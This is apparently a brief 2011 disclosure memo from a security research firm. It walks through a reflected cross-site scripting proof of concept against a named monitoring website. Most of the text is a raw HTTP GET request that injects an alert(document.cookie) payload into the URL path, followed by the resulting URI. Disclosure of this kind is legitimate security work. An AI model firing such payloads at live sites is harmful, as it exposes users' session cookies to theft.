Hoyt LLC Research
Boston, MA US

Feb 26, 2011

Re: Walk Thru for PoC

Using a Tool such as Burp Suite Pro, ZAPROXY or other HTTP Tool by which to issue a GET

Issue a GET using the following:

GET /en/api/checkreferrer.phpa0d30'-alert(document.cookie)-'ef346e3dbf0?vjsRef=&vref_string=173.193.214.243%3A%3A0%3A%3A%3A%3Aen&vserverRef= HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1298770635.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165779128.1798479609.1298770635.1298770635.1298770635.1; __utmc=165779128; __utmb=165779128.1.10.1298770635


The Application will respond with a standard form of Alert Window displaying the document.cookie

The Resultant URI is expressed as http://www.watchmouse.com/en/api/checkreferrer.phpa0d30'-alert(document.cookie)-'ef346e3dbf0?vjsRef=&vref_string=173.193.214.243::0::::en&vserverRef=

Please also be advised that all PoC code and reports should be viewed is Vulnerability Execution Research and reviewed by the a senior developer or security team. 

Hoyt LLC Research aids a Site listed in the XSS DB free of charge.